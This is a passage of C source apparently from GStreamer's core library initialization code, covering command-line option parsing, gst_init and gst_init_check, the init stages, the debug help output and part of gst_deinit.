    {"gst-debug-no-color", 0, G_OPTION_FLAG_NO_ARG, G_OPTION_ARG_CALLBACK,
          (gpointer) parse_goption_arg, N_("Disable colored debugging output"),
        NULL},
    {"gst-debug-disable", 0, G_OPTION_FLAG_NO_ARG, G_OPTION_ARG_CALLBACK,
        (gpointer) parse_goption_arg, N_("Disable debugging"), NULL},
#endif
    {"gst-plugin-spew", 0, G_OPTION_FLAG_NO_ARG, G_OPTION_ARG_CALLBACK,
          (gpointer) parse_goption_arg,
          N_("Enable verbose plugin loading diagnostics"),
        NULL},
    {"gst-plugin-path", 0, 0, G_OPTION_ARG_CALLBACK,
          (gpointer) parse_goption_arg,
        N_("Colon-separated paths containing plugins"), N_("PATHS")},
    {"gst-plugin-load", 0, 0, G_OPTION_ARG_CALLBACK,
          (gpointer) parse_goption_arg,
          N_("Comma-separated list of plugins to preload in addition to the "
              "list stored in environment variable GST_PLUGIN_PATH"),
        N_("PLUGINS")},
    {"gst-disable-segtrap", 0, G_OPTION_FLAG_NO_ARG, G_OPTION_ARG_CALLBACK,
          (gpointer) parse_goption_arg,
          N_("Disable trapping of segmentation faults during plugin loading"),
        NULL},
    {"gst-disable-registry-update", 0, G_OPTION_FLAG_NO_ARG,
          G_OPTION_ARG_CALLBACK,
          (gpointer) parse_goption_arg,
          N_("Disable updating the registry"),
        NULL},
    {"gst-disable-registry-fork", 0, G_OPTION_FLAG_NO_ARG,
          G_OPTION_ARG_CALLBACK,
          (gpointer) parse_goption_arg,
          N_("Disable spawning a helper process while scanning the registry"),
        NULL},
    {NULL}
  };

  /* Since GLib 2.23.2 calling g_thread_init() 'late' is allowed and is
   * automatically done as part of g_type_init() */
  if (glib_check_version (2, 23, 3)) {
    /* The GLib threading system must be initialised before calling any other
     * GLib function according to the documentation; if the application hasn't
     * called gst_init() yet or initialised the threading system otherwise, we
     * better issue a warning here (since chances are high that the application
     * has already called other GLib functions such as g_option_context_new() */
    if (!g_thread_get_initialized ()) {
      g_warning ("The GStreamer function gst_init_get_option_group() was\n"
          "\tcalled, but the GLib threading system has not been initialised\n"
          "\tyet, something that must happen before any other GLib function\n"
          "\tis called. The application needs to be fixed so that it calls\n"
          "\t   if (!g_thread_get_initialized ()) g_thread_init(NULL);\n"
          "\tas very first thing in its main() function. Please file a bug\n"
          "\tagainst this application.");
      g_thread_init (NULL);
    }
  } else {
    /* GLib >= 2.23.2 */
  }

  group = g_option_group_new ("gst", _("GStreamer Options"),
      _("Show GStreamer Options"), NULL, NULL);
  /* init_pre()/init_post() run before/after this group's options are parsed */
  g_option_group_set_parse_hooks (group, (GOptionParseFunc) init_pre,
      (GOptionParseFunc) init_post);
  g_option_group_add_entries (group, gst_args);
  g_option_group_set_translation_domain (group, GETTEXT_PACKAGE);

  return group;
#else
  return NULL;
#endif
}
/**
* gst_init_check:
* @argc: (inout) (allow-none): pointer to application's argc
* @argv: (inout) (array length=argc) (allow-none): pointer to application's argv
* @err: pointer to a #GError to which a message will be posted on error
*
* Initializes the GStreamer library, setting up internal path lists,
* registering built-in elements, and loading standard plugins.
*
* This function will return %FALSE if GStreamer could not be initialized
* for some reason. If you want your program to fail fatally,
* use gst_init() instead.
*
* This function should be called before calling any other GLib functions. If
* this is not an option, your program must initialise the GLib thread system
* using g_thread_init() before any other GLib functions are called.
*
* Returns: %TRUE if GStreamer could be initialized.
*/
gboolean
gst_init_check (int *argc, char **argv[], GError ** err)
{
#ifndef GST_DISABLE_OPTION_PARSING
  GOptionGroup *group;
  GOptionContext *ctx;
#endif
  gboolean res;

#ifdef ENABLE_VISUAL_STUDIO_MEMORY_LEAKS_DETECTION
#include <crtdbg.h>
  _CrtSetDbgFlag (_CRTDBG_ALLOC_MEM_DF | _CRTDBG_LEAK_CHECK_DF);
  _CrtSetReportMode (_CRT_ERROR, _CRTDBG_MODE_DEBUG);
#endif // ENABLE_VISUAL_STUDIO_MEMORY_LEAKS_DETECTION

  /* GLib threading must be up before any other GLib call */
  if (!g_thread_get_initialized ())
    g_thread_init (NULL);

  /* calling gst_init() twice is a no-op */
  if (gst_initialized) {
    GST_DEBUG ("already initialized gst");
    return TRUE;
  }
#ifndef GST_DISABLE_OPTION_PARSING
  /* parse our own command-line options; init_pre()/init_post() run as
   * parse hooks of the GStreamer option group */
  ctx = g_option_context_new ("- GStreamer initialization");
  g_option_context_set_ignore_unknown_options (ctx, TRUE);
  group = gst_init_get_option_group ();
  g_option_context_add_group (ctx, group);
  res = g_option_context_parse (ctx, argc, argv, err);
  g_option_context_free (ctx);
#else
  init_pre (NULL, NULL, NULL, NULL);
  init_post (NULL, NULL, NULL, NULL);
  res = TRUE;
#endif

  gst_initialized = res;

  if (res) {
    GST_INFO ("initialized GStreamer successfully");
  } else {
    GST_INFO ("failed to initialize GStreamer");
  }

  return res;
}
/**
* gst_init:
* @argc: (inout) (allow-none): pointer to application's argc
* @argv: (inout) (array length=argc) (allow-none): pointer to application's argv
*
* Initializes the GStreamer library, setting up internal path lists,
* registering built-in elements, and loading standard plugins.
*
* Unless the plugin registry is disabled at compile time, the registry will be
* loaded. By default this will also check if the registry cache needs to be
* updated and rescan all plugins if needed. See gst_update_registry() for
* details and section
* <link linkend="gst-running">Running GStreamer Applications</link>
* for how to disable automatic registry updates.
*
* This function should be called before calling any other GLib functions. If
* this is not an option, your program must initialise the GLib thread system
* using g_thread_init() before any other GLib functions are called.
*
* <note><para>
* This function will terminate your program if it was unable to initialize
* GStreamer for some reason. If you want your program to fall back,
* use gst_init_check() instead.
* </para></note>
*
* WARNING: This function does not work in the same way as corresponding
* functions in other glib-style libraries, such as gtk_init(). In
* particular, unknown command line options cause this function to
* abort program execution.
*/
/* Fatal variant of gst_init_check(): on failure, print the error and
 * terminate the process with exit code 1. */
void
gst_init (int *argc, char **argv[])
{
  GError *err = NULL;

  if (gst_init_check (argc, argv, &err))
    return;

  g_print ("Could not initialize GStreamer: %s\n",
      err ? err->message : "unknown error occurred");
  if (err) {
    g_error_free (err);
  }
  exit (1);
}
/**
* gst_is_initialized:
*
* Use this function to check if GStreamer has been initialized with gst_init()
* or gst_init_check().
*
* Returns: TRUE if initialization has been done, FALSE otherwise.
*
* Since: 0.10.31
*/
gboolean
gst_is_initialized (void)
{
  /* flag is set by gst_init_check() (and early by init_post()) */
  return gst_initialized;
}
#ifndef GST_DISABLE_REGISTRY
/* GFunc callback for --gst-plugin-path elements: copy the path onto
 * _priv_gst_plugin_paths for delayed scanning (see declaration above). */
static void
add_path_func (gpointer data, gpointer user_data)
{
  GST_INFO ("Adding plugin path: \"%s\", will scan later", (gchar *) data);
  _priv_gst_plugin_paths =
      g_list_append (_priv_gst_plugin_paths, g_strdup (data));
}
#endif
#ifndef GST_DISABLE_OPTION_PARSING
/* GFunc callback for --gst-plugin-load elements: copy the plugin name onto
 * the _priv_gst_preload_plugins list. */
static void
prepare_for_load_plugin_func (gpointer data, gpointer user_data)
{
  _priv_gst_preload_plugins =
      g_slist_prepend (_priv_gst_preload_plugins, g_strdup (data));
}
#endif
#ifndef GST_DISABLE_OPTION_PARSING
/* Split @stringlist on @separator and invoke @iterator once per element.
 * g_strsplit() is capped at MAX_PATH_SPLIT tokens per round; when the input
 * has more elements than that, the final token holds the entire unsplit
 * remainder, which must be fed into another splitting round rather than
 * handed to @iterator as a single element. */
static void
split_and_iterate (const gchar * stringlist, const gchar * separator,
    GFunc iterator, gpointer user_data)
{
  gchar **strings;
  gint j;
  gchar *lastlist = g_strdup (stringlist);

  while (lastlist) {
    strings = g_strsplit (lastlist, separator, MAX_PATH_SPLIT);
    g_free (lastlist);
    lastlist = NULL;

    for (j = 0; strings[j]; j++) {
      if (j == MAX_PATH_SPLIT - 1 && strstr (strings[j], separator)) {
        /* last slot still contains separators: this is the unsplit
         * remainder, process it in the next round */
        lastlist = g_strdup (strings[j]);
        break;
      }
      iterator (strings[j], user_data);
    }
    g_strfreev (strings);
  }
}
#endif
/* we have no fail cases yet, but maybe in the future */
/* First init stage, run as the pre-parse hook of the GStreamer option group
 * (or directly from gst_init_check() when option parsing is disabled):
 * GType init, debug system setup, and environment-variable handling. */
static gboolean
init_pre (GOptionContext * context, GOptionGroup * group, gpointer data,
    GError ** error)
{
  if (gst_initialized) {
    GST_DEBUG ("already initialized");
    return TRUE;
  }

  g_type_init ();

  /* we need threading to be enabled right here */
  g_assert (g_thread_get_initialized ());
  _gst_debug_init ();

#ifdef ENABLE_NLS
  setlocale (LC_ALL, "");
  bindtextdomain (GETTEXT_PACKAGE, LOCALEDIR);
  bind_textdomain_codeset (GETTEXT_PACKAGE, "UTF-8");
#endif /* ENABLE_NLS */

#ifndef GST_DISABLE_GST_DEBUG
  {
    const gchar *debug_list;

    /* honour GST_DEBUG_NO_COLOR and GST_DEBUG environment variables */
    if (g_getenv ("GST_DEBUG_NO_COLOR") != NULL)
      gst_debug_set_colored (FALSE);

    debug_list = g_getenv ("GST_DEBUG");
    if (debug_list) {
      parse_debug_list (debug_list);
    }
  }

  priv_gst_dump_dot_dir = g_getenv ("GST_DEBUG_DUMP_DOT_DIR");
#endif
  /* This is the earliest we can make stuff show up in the logs.
   * So give some useful info about GStreamer here */
  GST_INFO ("Initializing GStreamer Core Library version %s", VERSION);
#ifndef GSTREAMER_LITE
  GST_INFO ("Using library installed in %s", LIBDIR);
#endif // GSTREAMER_LITE

  /* Print some basic system details if possible (OS/architecture) */
#ifdef HAVE_SYS_UTSNAME_H
  {
    struct utsname sys_details;

    if (uname (&sys_details) == 0) {
      GST_INFO ("%s %s %s %s %s", sys_details.sysname,
          sys_details.nodename, sys_details.release, sys_details.version,
          sys_details.machine);
    }
  }
#endif

  return TRUE;
}
/* Register the builtin "bin" and "pipeline" element types on @plugin.
 * Failure to register either is a programming error and aborts. */
static gboolean
gst_register_core_elements (GstPlugin * plugin)
{
  gboolean registered;

  registered =
      gst_element_register (plugin, "bin", GST_RANK_PRIMARY, GST_TYPE_BIN);
  registered = registered
      && gst_element_register (plugin, "pipeline", GST_RANK_PRIMARY,
      GST_TYPE_PIPELINE);

  if (!registered)
    g_assert_not_reached ();

  return TRUE;
}
/*
* this bit handles:
* - initalization of threads if we use them
* - log handler
* - initial output
* - initializes gst_format
* - registers a bunch of types for gst_objects
*
* - we don't have cases yet where this fails, but in the future
* we might and then it's nice to be able to return that
*/
/* Second init stage, run as the post-parse hook of the option group:
 * installs the log handler, initializes the core subsystems, refs all core
 * GTypes (gst_deinit() drops these refs again), registers the builtin
 * plugins and updates the registry. */
static gboolean
init_post (GOptionContext * context, GOptionGroup * group, gpointer data,
    GError ** error)
{
  GLogLevelFlags llf;
#ifndef GST_DISABLE_TRACE
  GstTrace *gst_trace;
#endif /* GST_DISABLE_TRACE */

  if (gst_initialized) {
    GST_DEBUG ("already initialized");
    return TRUE;
  }

  /* route fatal-ish messages of our log domain through debug_log_handler() */
  llf = G_LOG_LEVEL_CRITICAL | G_LOG_LEVEL_ERROR | G_LOG_FLAG_FATAL;
  g_log_set_handler (g_log_domain_gstreamer, llf, debug_log_handler, NULL);

  _priv_gst_quarks_initialize ();
  _gst_format_initialize ();
  _gst_query_initialize ();

  /* take a class ref on every core type so the classes stay alive for the
   * lifetime of the library; the matching unrefs are in gst_deinit() */
  g_type_class_ref (gst_object_get_type ());
  g_type_class_ref (gst_pad_get_type ());
  g_type_class_ref (gst_element_factory_get_type ());
  g_type_class_ref (gst_element_get_type ());
  g_type_class_ref (gst_type_find_factory_get_type ());
  g_type_class_ref (gst_bin_get_type ());
  g_type_class_ref (gst_bus_get_type ());
  g_type_class_ref (gst_task_get_type ());
  g_type_class_ref (gst_clock_get_type ());
  g_type_class_ref (gst_index_factory_get_type ());
  gst_uri_handler_get_type ();

  g_type_class_ref (gst_object_flags_get_type ());
  g_type_class_ref (gst_bin_flags_get_type ());
  g_type_class_ref (gst_buffer_flag_get_type ());
  g_type_class_ref (gst_buffer_copy_flags_get_type ());
#ifndef GSTREAMER_LITE
  g_type_class_ref (gst_buffer_list_item_get_type ());
#endif // GSTREAMER_LITE
  g_type_class_ref (gst_bus_flags_get_type ());
  g_type_class_ref (gst_bus_sync_reply_get_type ());
  g_type_class_ref (gst_caps_flags_get_type ());
  g_type_class_ref (gst_clock_return_get_type ());
  g_type_class_ref (gst_clock_entry_type_get_type ());
  g_type_class_ref (gst_clock_flags_get_type ());
  g_type_class_ref (gst_clock_type_get_type ());
  g_type_class_ref (gst_debug_graph_details_get_type ());
  g_type_class_ref (gst_state_get_type ());
  g_type_class_ref (gst_state_change_return_get_type ());
  g_type_class_ref (gst_state_change_get_type ());
  g_type_class_ref (gst_element_flags_get_type ());
  g_type_class_ref (gst_core_error_get_type ());
  g_type_class_ref (gst_library_error_get_type ());
  g_type_class_ref (gst_resource_error_get_type ());
  g_type_class_ref (gst_stream_error_get_type ());
  g_type_class_ref (gst_event_type_flags_get_type ());
  g_type_class_ref (gst_event_type_get_type ());
  g_type_class_ref (gst_seek_type_get_type ());
  g_type_class_ref (gst_seek_flags_get_type ());
  g_type_class_ref (gst_qos_type_get_type ());
  g_type_class_ref (gst_format_get_type ());
  g_type_class_ref (gst_index_certainty_get_type ());
  g_type_class_ref (gst_index_entry_type_get_type ());
  g_type_class_ref (gst_index_lookup_method_get_type ());
  g_type_class_ref (gst_assoc_flags_get_type ());
  g_type_class_ref (gst_index_resolver_method_get_type ());
  g_type_class_ref (gst_index_flags_get_type ());
  g_type_class_ref (gst_debug_level_get_type ());
  g_type_class_ref (gst_debug_color_flags_get_type ());
  g_type_class_ref (gst_iterator_result_get_type ());
  g_type_class_ref (gst_iterator_item_get_type ());
  g_type_class_ref (gst_message_type_get_type ());
  g_type_class_ref (gst_mini_object_flags_get_type ());
  g_type_class_ref (gst_pad_link_return_get_type ());
  g_type_class_ref (gst_pad_link_check_get_type ());
  g_type_class_ref (gst_flow_return_get_type ());
  g_type_class_ref (gst_activate_mode_get_type ());
  g_type_class_ref (gst_pad_direction_get_type ());
  g_type_class_ref (gst_pad_flags_get_type ());
  g_type_class_ref (gst_pad_presence_get_type ());
  g_type_class_ref (gst_pad_template_flags_get_type ());
  g_type_class_ref (gst_pipeline_flags_get_type ());
  g_type_class_ref (gst_plugin_error_get_type ());
  g_type_class_ref (gst_plugin_flags_get_type ());
  g_type_class_ref (gst_plugin_dependency_flags_get_type ());
  g_type_class_ref (gst_rank_get_type ());
  g_type_class_ref (gst_query_type_get_type ());
  g_type_class_ref (gst_buffering_mode_get_type ());
  g_type_class_ref (gst_stream_status_type_get_type ());
  g_type_class_ref (gst_structure_change_type_get_type ());
  g_type_class_ref (gst_tag_merge_mode_get_type ());
  g_type_class_ref (gst_tag_flag_get_type ());
  g_type_class_ref (gst_task_pool_get_type ());
  g_type_class_ref (gst_task_state_get_type ());
  g_type_class_ref (gst_alloc_trace_flags_get_type ());
  g_type_class_ref (gst_type_find_probability_get_type ());
  g_type_class_ref (gst_uri_type_get_type ());
  g_type_class_ref (gst_parse_error_get_type ());
  g_type_class_ref (gst_parse_flags_get_type ());
  g_type_class_ref (gst_search_mode_get_type ());
  g_type_class_ref (gst_progress_type_get_type ());
  g_type_class_ref (gst_caps_intersect_mode_get_type ());

  gst_structure_get_type ();
  _gst_value_initialize ();
  g_type_class_ref (gst_param_spec_fraction_get_type ());
  gst_caps_get_type ();
  _gst_event_initialize ();
  _gst_buffer_initialize ();
  _gst_buffer_list_initialize ();
  gst_buffer_list_iterator_get_type ();
  _gst_message_initialize ();
  _gst_tag_initialize ();
  gst_parse_context_get_type ();

  _gst_plugin_initialize ();

  gst_g_error_get_type ();

  /* register core plugins */
  gst_plugin_register_static (GST_VERSION_MAJOR, GST_VERSION_MINOR,
      "staticelements", "core elements linked into the GStreamer library",
      gst_register_core_elements, VERSION, GST_LICENSE, PACKAGE,
      GST_PACKAGE_NAME, GST_PACKAGE_ORIGIN);

#if defined(GSTREAMER_LITE)
  gst_plugin_register_static (GST_VERSION_MAJOR, GST_VERSION_MINOR,
      "gstplugins-lite", "gstplugins-lite",
      lite_plugins_init, VERSION, GST_LICENSE, PACKAGE,
      GST_PACKAGE_NAME, GST_PACKAGE_ORIGIN);
#endif // GSTREAMER_LITE

  /*
   * Any errors happening below this point are non-fatal, we therefore mark
   * gstreamer as being initialized, since it is the case from a plugin point of
   * view.
   *
   * If anything fails, it will be put back to FALSE in gst_init_check().
   * This allows some special plugins that would call gst_init() to not cause a
   * looping effect (i.e. initializing GStreamer twice).
   */
  gst_initialized = TRUE;

  if (!gst_update_registry ())
    return FALSE;

#ifndef GST_DISABLE_TRACE
  /* tracing is forced off here, so the trace object is never created */
  _gst_trace_on = 0;
  if (_gst_trace_on) {
    gst_trace = gst_trace_new ("gst.trace", 1024);
    gst_trace_set_default (gst_trace);
  }
#endif /* GST_DISABLE_TRACE */

  GST_INFO ("GLib runtime version: %d.%d.%d", glib_major_version,
      glib_minor_version, glib_micro_version);
  GST_INFO ("GLib headers version: %d.%d.%d", GLIB_MAJOR_VERSION,
      GLIB_MINOR_VERSION, GLIB_MICRO_VERSION);

  return TRUE;
}
#ifndef GST_DISABLE_GST_DEBUG
/* GstPluginFilter that accepts every plugin; used by gst_debug_help() to
 * fetch the complete plugin list from the registry. */
static gboolean
select_all (GstPlugin * plugin, gpointer user_data)
{
  return TRUE;
}
/* GCompareFunc ordering two GstDebugCategory pointers by category name. */
static gint
sort_by_category_name (gconstpointer a, gconstpointer b)
{
  const gchar *name_a = gst_debug_category_get_name ((GstDebugCategory *) a);
  const gchar *name_b = gst_debug_category_get_name ((GstDebugCategory *) b);

  return strcmp (name_a, name_b);
}
/* Implements --gst-debug-help: finish initialization, load all plugins so
 * their debug categories are registered, then print a sorted table of
 * category names, thresholds and descriptions. */
static void
gst_debug_help (void)
{
  GSList *list, *walk;
  GList *list2, *g;

  /* Need to ensure the registry is loaded to get debug categories */
  if (!init_post (NULL, NULL, NULL, NULL))
    exit (1);

  list2 = gst_registry_plugin_filter (gst_registry_get_default (),
      select_all, FALSE, NULL);

  /* FIXME this is gross.  why don't debug have categories PluginFeatures? */
  for (g = list2; g; g = g_list_next (g)) {
    GstPlugin *plugin = GST_PLUGIN_CAST (g->data);

    gst_plugin_load (plugin);
  }
  g_list_free (list2);

  list = gst_debug_get_all_categories ();
  walk = list = g_slist_sort (list, sort_by_category_name);

  g_print ("\n");
  g_print ("name                  level    description\n");
  g_print ("---------------------+--------+--------------------------------\n");

  while (walk) {
    GstDebugCategory *cat = (GstDebugCategory *) walk->data;

    if (gst_debug_is_colored ()) {
#ifdef G_OS_WIN32
      /* Windows console: set text attributes directly on the console handle */
      gint color = gst_debug_construct_win_color (cat->color);
      const gint clear = FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_BLUE;

      SetConsoleTextAttribute (GetStdHandle (STD_OUTPUT_HANDLE), color);
      g_print ("%-20s", gst_debug_category_get_name (cat));
      SetConsoleTextAttribute (GetStdHandle (STD_OUTPUT_HANDLE), clear);
      g_print (" %1d %s ", gst_debug_category_get_threshold (cat),
          gst_debug_level_get_name (gst_debug_category_get_threshold (cat)));
      SetConsoleTextAttribute (GetStdHandle (STD_OUTPUT_HANDLE), color);
      g_print ("%s", gst_debug_category_get_description (cat));
      SetConsoleTextAttribute (GetStdHandle (STD_OUTPUT_HANDLE), clear);
      g_print ("\n");
#else /* G_OS_WIN32 */
      /* ANSI terminal: wrap fields in escape sequences */
      gchar *color = gst_debug_construct_term_color (cat->color);

      g_print ("%s%-20s\033[00m  %1d %s  %s%s\033[00m\n",
          color,
          gst_debug_category_get_name (cat),
          gst_debug_category_get_threshold (cat),
          gst_debug_level_get_name (gst_debug_category_get_threshold (cat)),
          color, gst_debug_category_get_description (cat));
      g_free (color);
#endif /* G_OS_WIN32 */
    } else {
      g_print ("%-20s  %1d %s  %s\n", gst_debug_category_get_name (cat),
          gst_debug_category_get_threshold (cat),
          gst_debug_level_get_name (gst_debug_category_get_threshold (cat)),
          gst_debug_category_get_description (cat));
    }
    walk = g_slist_next (walk);
  }

  g_slist_free (list);
  g_print ("\n");
}
#endif
#ifndef GST_DISABLE_OPTION_PARSING
/* Apply one command-line option identified by its ARG_* id @opt with
 * argument @arg. Returns FALSE and sets @err for unknown ids; some options
 * (version, debug-help) print and exit the process directly. */
static gboolean
parse_one_option (gint opt, const gchar * arg, GError ** err)
{
  switch (opt) {
    case ARG_VERSION:
      g_print ("GStreamer Core Library version %s\n", PACKAGE_VERSION);
      exit (0);
    case ARG_FATAL_WARNINGS:{
      GLogLevelFlags fatal_mask;

      /* make warnings and criticals abort, in addition to the default mask */
      fatal_mask = g_log_set_always_fatal (G_LOG_FATAL_MASK);
      fatal_mask |= G_LOG_LEVEL_WARNING | G_LOG_LEVEL_CRITICAL;
      g_log_set_always_fatal (fatal_mask);
      break;
    }
#ifndef GST_DISABLE_GST_DEBUG
    case ARG_DEBUG_LEVEL:{
      gint tmp = 0;

      /* out-of-range values are silently ignored */
      tmp = strtol (arg, NULL, 0);
      if (tmp >= 0 && tmp < GST_LEVEL_COUNT) {
        gst_debug_set_default_threshold (tmp);
      }
      break;
    }
    case ARG_DEBUG:
      parse_debug_list (arg);
      break;
    case ARG_DEBUG_NO_COLOR:
      gst_debug_set_colored (FALSE);
      break;
    case ARG_DEBUG_DISABLE:
      gst_debug_set_active (FALSE);
      break;
    case ARG_DEBUG_HELP:
      gst_debug_help ();
      exit (0);
#endif
    case ARG_PLUGIN_SPEW:
      /* accepted for compatibility; has no effect here */
      break;
    case ARG_PLUGIN_PATH:
#ifndef GST_DISABLE_REGISTRY
      split_and_iterate (arg, G_SEARCHPATH_SEPARATOR_S, add_path_func, NULL);
#endif /* GST_DISABLE_REGISTRY */
      break;
    case ARG_PLUGIN_LOAD:
      split_and_iterate (arg, ",", prepare_for_load_plugin_func, NULL);
      break;
    case ARG_SEGTRAP_DISABLE:
      _gst_disable_segtrap = TRUE;
      break;
    case ARG_REGISTRY_UPDATE_DISABLE:
#ifndef GST_DISABLE_REGISTRY
      _priv_gst_disable_registry_update = TRUE;
#endif
      break;
    case ARG_REGISTRY_FORK_DISABLE:
      gst_registry_fork_set_enabled (FALSE);
      break;
    default:
      g_set_error (err, G_OPTION_ERROR, G_OPTION_ERROR_UNKNOWN_OPTION,
          _("Unknown option"));
      return FALSE;
  }

  return TRUE;
}
/* GOptionArgFunc for all GStreamer options: translate the long option name
 * @opt into its ARG_* id and hand it to parse_one_option(). Unknown names
 * map to 0, which parse_one_option() reports as an unknown-option error. */
static gboolean
parse_goption_arg (const gchar * opt,
    const gchar * arg, gpointer data, GError ** err)
{
  static const struct
  {
    const gchar *opt;
    int val;
  } options[] = {
    {"--gst-version", ARG_VERSION},
    {"--gst-fatal-warnings", ARG_FATAL_WARNINGS},
#ifndef GST_DISABLE_GST_DEBUG
    {"--gst-debug-level", ARG_DEBUG_LEVEL},
    {"--gst-debug", ARG_DEBUG},
    {"--gst-debug-disable", ARG_DEBUG_DISABLE},
    {"--gst-debug-no-color", ARG_DEBUG_NO_COLOR},
    {"--gst-debug-help", ARG_DEBUG_HELP},
#endif
    {"--gst-plugin-spew", ARG_PLUGIN_SPEW},
    {"--gst-plugin-path", ARG_PLUGIN_PATH},
    {"--gst-plugin-load", ARG_PLUGIN_LOAD},
    {"--gst-disable-segtrap", ARG_SEGTRAP_DISABLE},
    {"--gst-disable-registry-update", ARG_REGISTRY_UPDATE_DISABLE},
    {"--gst-disable-registry-fork", ARG_REGISTRY_FORK_DISABLE},
    {NULL, 0}
  };
  gint val = 0;
  gint n;

  for (n = 0; options[n].opt != NULL; n++) {
    if (strcmp (opt, options[n].opt) == 0) {
      val = options[n].val;
      break;
    }
  }

  return parse_one_option (val, arg, err);
}
#endif
/**
* gst_deinit:
*
* Clean up any resources created by GStreamer in gst_init().
*
* It is normally not needed to call this function in a normal application
* as the resources will automatically be freed when the program terminates.
* This function is therefore mostly used by testsuites and other memory
* profiling tools.
*
* After this call GStreamer (including this method) should not be used anymore.
*/
void
gst_deinit (void)
{
  GstClock *clock;

  GST_INFO ("deinitializing GStreamer");

  /* Idempotent: a second call is a harmless no-op. */
  if (gst_deinitialized) {
    GST_DEBUG ("already deinitialized");
    return;
  }

  /* Free the list of plugin names scheduled for preloading. */
  g_slist_foreach (_priv_gst_preload_plugins, (GFunc) g_free, NULL);
  g_slist_free (_priv_gst_preload_plugins);
  _priv_gst_preload_plugins = NULL;

#ifndef GST_DISABLE_REGISTRY
  /* Free the extra plugin search paths added via command-line options. */
  g_list_foreach (_priv_gst_plugin_paths, (GFunc) g_free, NULL);
  g_list_free (_priv_gst_plugin_paths);
  _priv_gst_plugin_paths = NULL;
#endif

  /* The double unref is deliberate: gst_system_clock_obtain() returns a
   * new reference, and the second unref drops the singleton's own
   * internal reference so the clock object is actually destroyed. */
  clock = gst_system_clock_obtain ();
  gst_object_unref (clock);
  gst_object_unref (clock);

  _priv_gst_registry_cleanup ();

  /* Drop the extra class reference taken on each GType during gst_init()
   * so that class data (and the leak reports of memory profilers) are
   * cleaned up. Order mirrors the ref order at init time. */
  g_type_class_unref (g_type_class_peek (gst_object_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_pad_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_element_factory_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_element_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_type_find_factory_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_bin_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_bus_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_task_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_index_factory_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_object_flags_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_bin_flags_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_buffer_flag_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_buffer_copy_flags_get_type ()));
#ifndef GSTREAMER_LITE
  g_type_class_unref (g_type_class_peek (gst_buffer_list_item_get_type ()));
#endif // GSTREAMER_LITE
  g_type_class_unref (g_type_class_peek (gst_bus_flags_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_bus_sync_reply_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_caps_flags_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_clock_type_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_clock_return_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_clock_entry_type_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_clock_flags_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_debug_graph_details_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_state_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_state_change_return_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_state_change_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_element_flags_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_core_error_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_library_error_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_plugin_dependency_flags_get_type
          ()));
  g_type_class_unref (g_type_class_peek (gst_parse_flags_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_resource_error_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_search_mode_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_stream_error_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_stream_status_type_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_structure_change_type_get_type
          ()));
  g_type_class_unref (g_type_class_peek (gst_event_type_flags_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_event_type_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_seek_type_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_seek_flags_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_qos_type_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_format_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_index_certainty_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_index_entry_type_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_index_lookup_method_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_assoc_flags_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_index_resolver_method_get_type
          ()));
  g_type_class_unref (g_type_class_peek (gst_index_flags_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_debug_level_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_debug_color_flags_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_iterator_result_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_iterator_item_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_message_type_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_mini_object_flags_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_pad_link_return_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_pad_link_check_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_flow_return_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_activate_mode_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_pad_direction_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_pad_flags_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_pad_presence_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_pad_template_flags_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_pipeline_flags_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_plugin_error_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_plugin_flags_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_rank_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_query_type_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_buffering_mode_get_type ()));
